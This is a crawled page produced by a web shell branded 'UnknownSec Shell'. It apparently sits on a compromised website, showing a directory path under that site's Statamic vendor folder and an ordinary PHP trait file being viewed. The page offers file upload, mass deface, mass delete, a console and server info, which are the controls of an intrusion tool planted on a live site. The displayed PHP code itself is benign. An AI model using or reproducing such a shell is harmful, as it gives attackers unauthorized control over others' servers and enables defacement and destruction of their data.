shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
mpc.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
Data
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
ContainsSupplementalData.php
<?php namespace Statamic\Data; trait ContainsSupplementalData { protected $supplements; public function supplements() { return $this->supplements; } public function setSupplement($key, $value) { $this->supplements[$key] = $value; return $this; } public function getSupplement($key) { return $this->supplements[$key] ?? null; } public function hasSupplement($key) { return collect($this->supplements)->has($key); } }
© 2026 UnknownSec